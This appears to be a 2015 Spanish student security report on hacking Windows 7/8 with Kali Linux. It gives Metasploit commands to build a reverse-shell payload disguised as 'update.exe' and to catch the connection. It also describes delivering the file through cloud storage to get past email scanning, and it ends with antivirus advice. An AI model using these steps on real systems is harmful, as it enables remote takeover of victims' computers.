Você está na página 1de 10

1 DE JUNIO DE 2015

HERRAMIENTAS PARA HACKEAR


WINDOWS 7, WINDOWS 8
Christian Quirs
Adriana Quirs
Esteban Rodrguez
UMCA

Introduccin
La seguridad informtica se encarga de proteger la privacidad y la integridad de la
informacin de manera que permita asegurar los sistemas.
Para cumplir lo anterior es importante usar nuestros conocimientos en informtica
para realizar pruebas y encontrar las vulnerabilidades que un sistema o red puede
tener.
Actualmente, se encuentran en la web gran cantidad de programas, videos y
manuales los cuales ensean mltiples formas de hurtar informacin. Incluso
usuarios sin muchos conocimientos tcnicos pueden infringir cualquier sistema.
El proyecto que a continuacin se desarrollar, es una investigacin de software
gratuito que permite realizar ataques a cualquier sistema operativo y encontrar
vulnerabilidades para tomar el control de otros equipos.
Desde la creacin de una carpeta de forma remota hasta la eliminacin de
archivos o apagar el equipo, son algunas de las acciones que se pudieron realizar.
Al final de esta investigacin, pudimos comprobar que no todo lo que est
publicado en la web es verdadero, y que es esencial estar preparado para
enfrentar y proteger nuestra informacin

Kali Linux
Kali Linux es una distribucin de Linux avanzada para pruebas de penetracin y
auditoras de seguridad.
Kali es la nueva versin del BackTrack Linux se adhiere completamente a los
estndares de desarrollo de Debian. Cuenta con ms de 300 herramientas de
penetracin y es gratuito.
Con Kali, fue posible usar un cdigo malicioso para generar un PayLoad. El
PayLoad es el cdigo o malware que se va a ejecutar en la mquina de la vctima
el cual permitir que de forma remota se pueda realizar cualquier accin mediante
comandos de DOS.
Lo primero que realizamos fue ejecutar el Kali Linux dentro de una red luego
abrimos una terminal

Buscamos nuestra IP con el comando: Ifconfig y presionamos Enter.

La IP es un dato de suma importancia para generar nuestro payload.


Para hacer el payload, en la consola debemos escribir:
msfpayload Windows/meterpreter/reverse_tcp LHOST= nuestra direccin ip
LPORT= 8080 x > /root/Desktop/update.exe
El nombre del archivo puede ser cualquiera, siempre debe tener la extensin .exe.

Una vez que confirme las opciones, se ha generado satisfactoriamente el payload.


Podemos tomar el archivo y enviarlo a algn Host para hackearlo.

Es importante abrir otra terminal y ejecutar el comando msfconsole

Escribimos los siguientes comandos, despus de cada lnea debe presionar Enter:

Use exploit/multi/handler
set PAYLOAD Windows/meterpreter/reverse_tcp
Set LHOST nuestra direccin IP
Set LPORT 8080
exploit

En este momento quedamos a la espera que se ejecute el payload.


Apenas el archivo sea ejecutado, se har una conexin entre la maquina nuestra y
la vctima.

Una vez que se establezca la conexin podemos escribir el comando Shell para
proceder a ejecutar comandos DOS dentro del equipo de la vctima.

Conclusiones y Recomendaciones
En este proyecto pudimos comprobar que de manera gratuita se puede tener
acceso a herramientas que infrinjan la seguridad de nuestros equipos.
El payload generado y el exploit funcionan nicamente dentro de la misma red, se
realizaron pruebas en distintas redes y no fue posible la conexin entre la vctima
y la maquina atacante.
Otro aspecto que resaltamos es que se necesita de ingeniera social para hacer
llegar el ejecutable al equipo de la vctima, el enviarlo por correo no fue posible,
debido a que todo ejecutable es detectado como malicioso y un potencial virus.
Lo que si fue posible es subir el ejecutable a la nube mediante google Drive u
Onedrive. De esta manera se logr compartir el archivo.
La conexin se realiza cada vez que se ejecuta el archivo del payload, por lo que
si se llega a apagar la maquina o pierde la conexin de red, no es posible seguir
invadiendo la computadora de la vctima.
Entre las recomendaciones que brindamos para evitar este tipo de intrusin estn:
1. Tener un antivirus legalmente instalado.
2. Contar con un antivirus actualizado.
3. No desactivar el antivirus para realizar alguna instalacin si no se tiene la
certeza del tipo de programa que se desea instalar.
4. Escanear cualquier archivo antes de abrirlo.
5. Crear ambientes de prueba virtuales para descargar exploits, keyloggers,
troyanos ya que el infectado puede ser uno.
6. Cerrar inmediatamente la pgina en caso que el navegador notifique que es
un sitio o archivo inseguro.

Bibliografa
http://es.docs.kali.org/introduction-es/que-es-kali-linux

https://www.youtube.com/watch?v=qhJA_ZhdiGQ

Você também pode gostar